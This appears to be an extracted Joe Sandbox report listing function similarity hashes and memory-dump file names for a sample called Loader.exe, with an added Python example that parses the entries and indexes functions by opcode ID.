• API String ID: 0-549300646
• Opcode ID: 769f037a5c437fd7645bb54215a7d5972f007640cb1bcc9db7f61a879adfec3a
                                                                                                                                                                                                                                                                  • Instruction ID: 03c361561afb6c2f0309ab784c805cb2f9b1b610010b6131cc68336535444137
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 769f037a5c437fd7645bb54215a7d5972f007640cb1bcc9db7f61a879adfec3a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B15A73B405224FDF048DBCD9993EE3BF2AB53325F206619D5249BB95D32B950ACB80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: ea6Q$j|[
• API String ID: 0-731571186
• Opcode ID: 9db828ec7b787c0d8aed04dfb84636787e0bc386f8ef08870833414a825bd4c3
• Instruction ID: b41085c74f7b0a3ecd200db217f26ef68445b489c9de3274e49410cd18759b11
• Opcode Fuzzy Hash: 9db828ec7b787c0d8aed04dfb84636787e0bc386f8ef08870833414a825bd4c3
• Instruction Fuzzy Hash: 75A159767405228FCB048DFCD9D93EE37F2AB43364F24661DC525DBB94D62AE50ACA80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: *[B6$Qel
• API String ID: 0-1438119675
• Opcode ID: 83f9872243b335d1ca47ee7dcd21e3490c536236ae620efbc580e4eeb07cfb7b
• Instruction ID: 4a1e7a40da6dd4a9391976186a471d3bfb5d754888afa859e1d3081ead4b5c6f
• Opcode Fuzzy Hash: 83f9872243b335d1ca47ee7dcd21e3490c536236ae620efbc580e4eeb07cfb7b
• Instruction Fuzzy Hash: 34B12536E45955CFDF04CEBCE9907DE7BF2AB47315F30811AE811E7B50D22A890A8B15
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: \:!$\:!
• API String ID: 0-2492501628
• Opcode ID: e5059cfa444dd258432b36c200dd1931fca15ecadab9ad5ba2b2d63c40074321
• Instruction ID: 928098466a01d5753188d6b444ba986ea2242110ae4ac23ed5c32c30b508aa1b
• Opcode Fuzzy Hash: e5059cfa444dd258432b36c200dd1931fca15ecadab9ad5ba2b2d63c40074321
• Instruction Fuzzy Hash: ABA1F776A452018FCF04CEBCE5C17EE7BF5AB87364F20C12AD415E7794C23A89498B85
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: !63-$!63-
• API String ID: 0-2936377451
• Opcode ID: f277c22bbc74b5227c60238e9af854ff1ba3a190086c40969f1ba243ab99840c
• Instruction ID: 28d7a0dd0ad59f7099fc0fa3e77eff54185393d7da751108cd3d2afbf44d29ca
• Opcode Fuzzy Hash: f277c22bbc74b5227c60238e9af854ff1ba3a190086c40969f1ba243ab99840c
• Instruction Fuzzy Hash: B5911472A445068FCF048FBCE5E53EE3BF6AB43358F209918D421DB795C52E890B8785
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: SWM
• API String ID: 0-3090310945
• Opcode ID: 0d58333de92029942e3f3e90149d5e6ca065112789da819c52147f0d0170909c
• Instruction ID: 9f8ff85ca76016830a0329507188937c66f29f74caed94a5060b459ca7badb4a
• Opcode Fuzzy Hash: 0d58333de92029942e3f3e90149d5e6ca065112789da819c52147f0d0170909c
• Instruction Fuzzy Hash: 0C720536A516918FCF05CEBCD9A53DE3BF2AB83314F306518D415DBB95C63AA80ACB01
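The entries above all come from the same dumped module (image base 6CE10000, code region at 6CE11000) and differ only in their Similarity identifiers. When you want to carry those identifiers into your own tooling (for example to match the Opcode ID or instruction fuzzy hash of a function against other Loader.exe reports), the extracted text has to be parsed first. The following Python is an added example, not Joe Sandbox's own code or part of this report; it parses entries in the layout shown above, decodes the dotted .sdmp file name, and indexes the functions by Opcode ID. Two assumptions are made and marked in the code: the first two dotted fields are taken to be the process index and dump stage (they match the `0_2` in the `hcaresult_0_2_6ce10000_Loader.jbxd` snapshot name), and the fifth field is taken to be a Win32 PAGE_* protection value (0x20 on the code page, 0x02 on the header page, 0x04 on the writable region, which is the layout a loaded PE image would have). Fields six to eight are kept verbatim and not interpreted. The sample input is constructed from the first two entries above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the first two entries of this section as extracted text,
# including the "Download File" link label the page's HTML leaves behind.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: iqo$ iqo
• API String ID: 0-549300646
• Opcode ID: 769f037a5c437fd7645bb54215a7d5972f007640cb1bcc9db7f61a879adfec3a
• Instruction ID: 03c361561afb6c2f0309ab784c805cb2f9b1b610010b6131cc68336535444137
• Opcode Fuzzy Hash: 769f037a5c437fd7645bb54215a7d5972f007640cb1bcc9db7f61a879adfec3a
• Instruction Fuzzy Hash: 07B15A73B405224FDF048DBCD9993EE3BF2AB53325F206619D5249BB95D32B950ACB80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: ea6Q$j|[
• API String ID: 0-731571186
• Opcode ID: 9db828ec7b787c0d8aed04dfb84636787e0bc386f8ef08870833414a825bd4c3
• Instruction ID: b41085c74f7b0a3ecd200db217f26ef68445b489c9de3274e49410cd18759b11
• Opcode Fuzzy Hash: 9db828ec7b787c0d8aed04dfb84636787e0bc386f8ef08870833414a825bd4c3
• Instruction Fuzzy Hash: 75A159767405228FCB048DFCD9D93EE37F2AB43364F24661DC525DBB94D62AE50ACA80
"""

# ASSUMPTION: the fifth dotted field of an .sdmp name is a Win32 PAGE_* value.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass(frozen=True)
class DumpRegion:
    process: int   # field 1 (assumed: process index, cf. "hcaresult_0_2_...")
    stage: int     # field 2 (assumed: dump stage)
    dump_id: int   # field 3, read as a decimal serial
    address: int   # field 4: region start address, hex
    protect: int   # field 5: page protection (assumed, see PAGE_PROTECT)
    tail: tuple    # fields 6-8, kept verbatim and not interpreted

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")


def parse_dump_name(name: str) -> DumpRegion:
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name}")
    proc, stage, dump_id, addr, prot, *tail = parts
    return DumpRegion(int(proc), int(stage), int(dump_id), int(addr, 16), int(prot, 16), tuple(tail))


BULLET = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_entries(text: str) -> list[dict]:
    """One dict per function entry; each entry starts at a 'Memory Dump Source' line."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"Associated": []}
            entries.append(cur)
            continue
        m = BULLET.match(line) if cur is not None else None
        if not m:
            continue  # section headers ("Strings", "Similarity", ...) and blanks
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":  # "<name>.sdmp, Offset: <hex>, based on PE: <bool>"
            name, _, rest = val.partition(",")
            cur[key] = name.strip()
            for kv in rest.split(","):
                k, _, v = kv.partition(":")
                cur[k.strip()] = v.strip()
        elif key == "Associated":  # drop the "Download File" link-label residue
            cur[key].append(val.removesuffix("Download File").strip())
        else:
            cur[key] = val
    return entries


def code_rva(entry: dict) -> int:
    """RVA of the dumped code region inside the image: region start minus Offset."""
    return parse_dump_name(entry["Source File"]).address - int(entry["Offset"], 16)


def region_layout(entry: dict) -> list[tuple[int, str]]:
    """(start address, protection) of the source region and its associated dumps, sorted."""
    regions = [parse_dump_name(n) for n in [entry["Source File"], *entry["Associated"]]]
    return sorted((r.address, r.protect_name) for r in regions)


def index_by_opcode_id(entries: list[dict]) -> dict[str, list[str]]:
    """Opcode ID -> instruction fuzzy hashes, the key used to match functions across reports."""
    idx: dict[str, list[str]] = {}
    for e in entries:
        idx.setdefault(e["Opcode ID"], []).append(e["Instruction Fuzzy Hash"])
    return idx


if __name__ == "__main__":
    for addr, prot in region_layout(parse_entries(SAMPLE)[0]):
        print(f"{addr:08X} {prot}")
```

Run stand-alone it prints the five regions of the dumped module with their decoded protection; in a pipeline, `index_by_opcode_id` over the entries of several reports gives you a lookup from Opcode ID to the fuzzy hashes seen for that function in each sample.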
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: >
• API String ID: 0-325317158
Strings
Similarity
• API ID:
• String ID: Unknown exception
• API String ID: 0-410509341
Strings
Similarity
• API ID:
• String ID: 2Tk
• API String ID: 0-3738452996
Strings
Similarity
• API ID:
• String ID: L0Hn
• API String ID: 0-1179079771
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE4F36E
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Similarity
• API ID:
• String ID:
• API String ID:
Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: <l
                                                                                                                                                                                                                                                                  • API String ID: 0-2115737348
                                                                                                                                                                                                                                                                  • Opcode ID: b00dd556be1492153541c98041d203a201bb15d0522cbb21f66888a91184167b
                                                                                                                                                                                                                                                                  • Instruction ID: cba72bbce23f3f9f1bd32b7494a3e1509eb898ee78d5efb679217bc860ccb4e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b00dd556be1492153541c98041d203a201bb15d0522cbb21f66888a91184167b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19D12476A419018FDF04CE7CE9D53DF7BF2AB87364F308519C425D7B95C62A8A0A8B11
Strings
Similarity
• API ID:
• String ID: bad array new length
• API String ID: 0-1242854226
• Opcode ID: f1566fb684e2f0173150444eb8fa7784806cc7566d3ba7c3a297a2d5c6c231fe
• Instruction ID: 902716867b8505b3ba7d4d0364403f42636becc3b3edc4283b2d8f9cf263b36c
• Opcode Fuzzy Hash: f1566fb684e2f0173150444eb8fa7784806cc7566d3ba7c3a297a2d5c6c231fe
• Instruction Fuzzy Hash: DFB11772A442068FCF04CFBCE5953EE7BF6AB8B354F209519D421DB794D22A990E8F50
Strings
Similarity
• API ID:
• String ID: vP
• API String ID: 0-1127721835
• Opcode ID: 2a5554a8688b8a5aecc60a2a696039720340e15053988c183daa12809f7c2648
• Instruction ID: bd0d238d13ddd67a8a353698a08ab88877ec5d184a07d40c94eeff0d45c1d77f
• Opcode Fuzzy Hash: 2a5554a8688b8a5aecc60a2a696039720340e15053988c183daa12809f7c2648
• Instruction Fuzzy Hash: 1E81EE72B052148FCB04DEACE5806EEBBF2BB4A318F20D129E854E7754D73999098B90
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2785e01d1c6f08c1223f148c1997a95fbbd8921500e97589fde0a8f3dd693f46
• Instruction ID: 1e346ac8773788cbb8e10caec501626cd6580d9cc994b134abc11ea98002fb44
• Opcode Fuzzy Hash: 2785e01d1c6f08c1223f148c1997a95fbbd8921500e97589fde0a8f3dd693f46
• Instruction Fuzzy Hash: A842E33AA656118FCB04CEBCE5D43DD7BF6AB47324F246219D415EB794C22A6E0ACF40
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 481f10a358cc620ac174463e69ee2c0546e50d38b361a621ec26a0e961a3e45e
• Instruction ID: eb94b1aabe3f204b5c19942cb509ad61163b4497e791148d56900ec90895a114
• Opcode Fuzzy Hash: 481f10a358cc620ac174463e69ee2c0546e50d38b361a621ec26a0e961a3e45e
• Instruction Fuzzy Hash: A922F336A445258FDF08CEBCD9D53CD77F2AB47324F249619C421EBB95E32E880A8B54
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d629e66a84152cca299c118d2489eed7a791f46130c41d6b7fa969d45d1835fb
• Instruction ID: f6455f80033ffbe3e9205b943814555bcaaabd1188d3e83c4ee347549efd7819
• Opcode Fuzzy Hash: d629e66a84152cca299c118d2489eed7a791f46130c41d6b7fa969d45d1835fb
• Instruction Fuzzy Hash: 8D22F776A505058FDF04CEBCF6957CD7BF6AB87324F30D11AD421EBB94C22A894A8B40

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ecbb231fc11a9f2da4d80f7fa1b6ec6b1f9b3e3e3a522922315662193e7b65d1
• Instruction ID: d31e390a69c74d0cb3aaaaaf81eaabdc07cc5f1f9211e76a57c831d5cd25141b
• Opcode Fuzzy Hash: ecbb231fc11a9f2da4d80f7fa1b6ec6b1f9b3e3e3a522922315662193e7b65d1
• Instruction Fuzzy Hash: 2922E472B50A118FCF08CE7CE9D57DEB7F2BB4B355F249519E811D7790C22A890A8B81
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61ba336d7fb1b1ec4862d48b369dc7b098efe615bc41fe1ba4e31e753eeca310
• Instruction ID: e9a815afe3242bbcd2e4ec6c03c75b981ec96e6d0856e02d5fe0fa46d3d70b12
• Opcode Fuzzy Hash: 61ba336d7fb1b1ec4862d48b369dc7b098efe615bc41fe1ba4e31e753eeca310
• Instruction Fuzzy Hash: 09020072A006248FCF08CEBCE5D13DE7BF2AB4B325F205529D411AB780D63D990ACB91
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd6fb344b06a28631e827e62a2ff14dfb5710b576d441d8089c762edd1362af0
• Instruction ID: d9b5881ab40b7d8a8b805f2ef095130fce2a7132da8f15d68b7f21247dbb9b4f
• Opcode Fuzzy Hash: fd6fb344b06a28631e827e62a2ff14dfb5710b576d441d8089c762edd1362af0
• Instruction Fuzzy Hash: 8B021572F002248FCB04DFBCE9952DD7BF2AB4A308F20A619D815E7754D63AE909CB55
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e38f5dd3dc2da4d5602a1fc765d1696ba8b66b8eb18fd68df09b64f6a77c8295
• Instruction ID: 361c74853306f8563ae74635a7994328698729edf01f4d0474c526458d8dd85e
• Opcode Fuzzy Hash: e38f5dd3dc2da4d5602a1fc765d1696ba8b66b8eb18fd68df09b64f6a77c8295
• Instruction Fuzzy Hash: 40F13676B142208FDF04DE7CD4943DE7BF2AB87314F24A619D415EB794C62AA90ACB41
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc7731099483213247b31bc2c0ea97c9697cddedf5037606fbea0afc65ad1c22
• Instruction ID: f432c3be3aec5ed170af277b6b32fe070cf69c92fb24073b4813e8957668dc0f
• Opcode Fuzzy Hash: fc7731099483213247b31bc2c0ea97c9697cddedf5037606fbea0afc65ad1c22
• Instruction Fuzzy Hash: F3C12736E40A058FCF04CE7CE5D57DF77F2AB87368F20D619C521A7B94D22A990A8B50
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48622f3ac24a899b2bd43a965f18af502381bc2b6eda1599d109b6663bf5cdb4
• Instruction ID: 9163bdc634451e5b4dc4ee7423efc200ace7dabecad0d741e6f1b3840acd3cb8
• Opcode Fuzzy Hash: 48622f3ac24a899b2bd43a965f18af502381bc2b6eda1599d109b6663bf5cdb4
• Instruction Fuzzy Hash: E7D10572B541158FDF04CE7CC9913DE7BF6AB4B324F246119D818FB790C22AA94ACB64
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 60bd6dec62f728ae93ea5f83e63c164f8e8e124c457ac145dc25b1d43297679b
                                                                                                                                                                                                                                                                  • Instruction ID: 75e343b582b50b7fe6bb5b48de0b9628ef809c3c18b4a0d307345bc064e2335f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60bd6dec62f728ae93ea5f83e63c164f8e8e124c457ac145dc25b1d43297679b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D11572A485118FCB04CEBCD8D17DEBBF6BB4B354F206019E416EB790C239A84ACB55
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 97b4dadf40a37b47dfd22c4d8435b4b08f5149f252ac762ebf85bafead18721d
                                                                                                                                                                                                                                                                  • Instruction ID: 023fb2648716fdf746dbbeb161f2050098a27de9628038780d09bc4f3374a5db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97b4dadf40a37b47dfd22c4d8435b4b08f5149f252ac762ebf85bafead18721d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46C12836B409558FCF08CEFCD5917DE7BF29B4B328F246209D414E7B94C62AA80ACB54
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ef3a75cc0eeadf4aabfc52712373bee3f4e001b475489331d399d849a160929a
                                                                                                                                                                                                                                                                  • Instruction ID: d4abd7b308318b9e9a561e4f6be2d56d45819db764359f336fc93f673af61361
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef3a75cc0eeadf4aabfc52712373bee3f4e001b475489331d399d849a160929a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB13736A455568FDF04CEBCC4D63EE7BF29B83364F35A115C9298B790D22AA50AC780
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: afc5b27e2d3c682c3b98062a4ac19408003b63f4d6b9ce26ee166de9b32f7abe
                                                                                                                                                                                                                                                                  • Instruction ID: 7eaeb4a1033c51dcdd4c1511fba2ce19208d2c0e4474ff30ba13d0d529713f0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc5b27e2d3c682c3b98062a4ac19408003b63f4d6b9ce26ee166de9b32f7abe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57C14936E445258FCF048E7CD4D83CD77F2AB5B325F24A615D868EB742C22A990ACB94
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
